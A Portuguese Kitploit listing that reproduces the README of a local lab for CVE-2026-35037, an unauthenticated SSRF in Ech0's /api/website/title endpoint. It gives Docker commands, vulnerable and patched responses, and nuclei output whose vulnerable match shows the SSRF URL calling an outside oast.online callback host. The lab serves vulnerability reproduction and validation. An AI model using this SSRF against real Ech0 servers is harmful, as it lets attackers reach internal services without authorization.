Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC_CVE-2026-35037 — Lab de reprodução isolado local para CVE-2026-35037, uma vulnerabilidade SSRF não autenticada no endpoint GET /api/website/title do Ech0. Inclui configuração do Docker Compose, script de verificação e template nuclei para validação. | Kitploit
Ferramentas/GitHubGitHub/fineman999/poc_cve-2026-35037
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

Lab de reprodução isolado local para CVE-2026-35037, uma vulnerabilidade SSRF não autenticada no endpoint GET /api/website/title do Ech0. Inclui configuração do Docker Compose, script de verificação e template nuclei para validação.

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório SSRF CVE-2026-35037 Ech0

Este repositório contém um laboratório de reprodução local e isolado para CVE-2026-35037, uma vulnerabilidade de SSRF não autenticada no endpoint GET /api/website/title do Ech0.

O laboratório usa um servidor de evidências local controlado em vez de metadados de nuvem ou infraestrutura de terceiros.

Resumo

  • Produto: lin-snow/Ech0
  • Vulnerabilidade: Server-Side Request Forgery
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • Versões afetadas: o GHSA lista <= 4.2.1; o NVD descreve versões anteriores a 4.2.8
  • Versão corrigida: 4.2.8
  • Endpoint: GET /api/website/title
  • Parâmetro: website_url
  • Autenticação: não necessária na versão vulnerável
  • Referências:

    • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
    • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

    Arquivos

    • docker-compose.yml: inicia o Ech0 e um servidor HTTP de evidências local
    • Dockerfile.ech0-lab: compila o Ech0 a partir da tag oficial do GitHub
    • verify-cve-2026-35037.sh: envia a solicitação controlada de verificação de SSRF
    • evidence/index.html: página HTML controlada com um <title> único
    • nuclei/CVE-2026-35037.yaml: template candidato para nuclei

    Por que compilar a partir do código-fonte?

    Tags Docker vulneráveis históricas, como sn0wl1n/ech0:4.2.1, não estavam disponíveis quando este laboratório foi criado. O laboratório compila a partir das tags oficiais do GitHub lin-snow/Ech0 em vez disso:

    • v4.2.1 para o candidato vulnerável
    • v4.2.8 para a comparação corrigida

    O Dockerfile local também evita problemas de build upstream observados com o build.Dockerfile histórico.

    Requisitos

    • Docker Engine ou Docker Desktop
    • curl
    • Opcional: nuclei

    Execute isso apenas em um laboratório local isolado. Não use estes comandos contra sistemas de terceiros. Use apenas contra sistemas que você possui ou para os quais tem autorização escrita explícita para testar.

    Reproduzir o comportamento vulnerável

    Inicie o Ech0 v4.2.1:

    root@kitploit:~
    ECH0_TAG=4.2.1 docker compose up -d --build
    

    Envie a solicitação de verificação controlada:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Resposta vulnerável esperada:

    root@kitploit:~
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    
    {"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
    

    Confirme que o Ech0 alcançou o servidor de evidências controlado:

    root@kitploit:~
    docker compose logs evidence
    

    Log de evidências observado:

    root@kitploit:~
    ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
    

    Comparar a versão corrigida

    Inicie o Ech0 v4.2.8:

    root@kitploit:~
    docker compose down -v
    ECH0_TAG=4.2.8 docker compose up -d --build
    

    Execute a mesma solicitação:

    root@kitploit:~
    sh verify-cve-2026-35037.sh
    

    Resposta corrigida observada:

    root@kitploit:~
    HTTP/1.1 401 Unauthorized
    Content-Type: application/json; charset=utf-8
    
    {"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
    

    Validação com Nuclei

    Valide o template:

    root@kitploit:~
    nuclei -validate -t nuclei/CVE-2026-35037.yaml
    

    Execute contra o v4.2.1 vulnerável:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Resultado vulnerável observado:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.online
    [CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
    [INF] Scan completed in 6.425886625s. 1 matches found.
    

    Execute contra o v4.2.8 corrigido:

    root@kitploit:~
    nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
    

    Resultado corrigido observado:

    root@kitploit:~
    [INF] Using Interactsh Server: oast.fun
    [INF] Scan completed in 5.974574416s. No results found.
    

    Limpeza

    root@kitploit:~
    docker compose down -v
    

    Notas

    • O laboratório manual usa http://evidence:8080/ dentro da rede do Docker Compose.
    • O template do nuclei usa {{interactsh-url}} e requer suporte a OAST/interactsh.
    • O template do nuclei usa {{interactsh-url}}, que contata os servidores interactsh do ProjectDiscovery, como oast.online ou oast.fun, por padrão. Use -iserver para substituir o servidor ou -ni para desativar o interactsh.
    • O laboratório não testa endpoints de metadados de nuvem.
    • O laboratório não contata alvos de produção ou de terceiros, exceto downloads normais de dependências/imagens durante o build do Docker.
    Baixar ferramenta